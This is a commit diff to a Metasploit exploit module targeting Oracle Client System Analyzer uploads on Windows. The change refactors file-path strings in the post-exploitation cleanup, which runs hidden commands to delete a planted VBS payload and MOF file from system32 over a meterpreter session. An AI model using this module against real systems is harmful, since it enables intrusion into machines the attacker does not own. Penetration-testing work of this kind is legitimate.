Not sure why paths were repeated, but no more.

Author: sinn3r

modules/exploits/windows/oracle/client_system_analyzer_upload.rb

@@ -63,25 +63,29 @@ def on_new_session(client)
 		return if not @var_mof_name
 		return if not @var_vbs_name
 
+		vbs_path = "C:\\windows\\system32\\#{@var_vbs_name}.vbs"
+		mof_path = "C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof"
+
 		if client.type != "meterpreter"
 			print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
-			print_error("The vbs payload (C:\\windows\\system32\\#{@var_vbs_name}.vbs) and mof file (C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof) must be removed manually.")
+			print_error("The vbs payload (#{vbs_path}) and mof file (#{mof_path}) must be removed manually.")
 			return
 		end
 
 		# stdapi must be loaded before we can use fs.file
 		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
 
-		cmd = "C:\\windows\\system32\\attrib.exe -r " +
-			"C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof"
+		attrib_path = "C:\\windows\\system32\\attrib.exe -r "
+
+		cmd = attrib_path + mof_path
 
 		client.sys.process.execute(cmd, nil, {'Hidden' => true })
 
 		begin
 			print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
-			client.fs.file.rm("C:\\windows\\system32\\" + @var_vbs_name + ".vbs")
+			client.fs.file.rm(vbs_path)
 			print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...")
-			client.fs.file.rm("C:\\windows\\system32\\wbem\\mof\\good\\" + @var_mof_name + ".mof")
+			client.fs.file.rm(mof_path)
 		rescue ::Exception => e
 			print_error("Exception: #{e.inspect}")
 		end
@@ -95,7 +99,7 @@ def upload_file(data)
 				'version' => '1.1',
 				'method'  => 'POST',
 				'ctype'   => "application/x-www-form-urlencoded",
-				'data'    => data,
+				'data'    => data
 			})
 
 		return res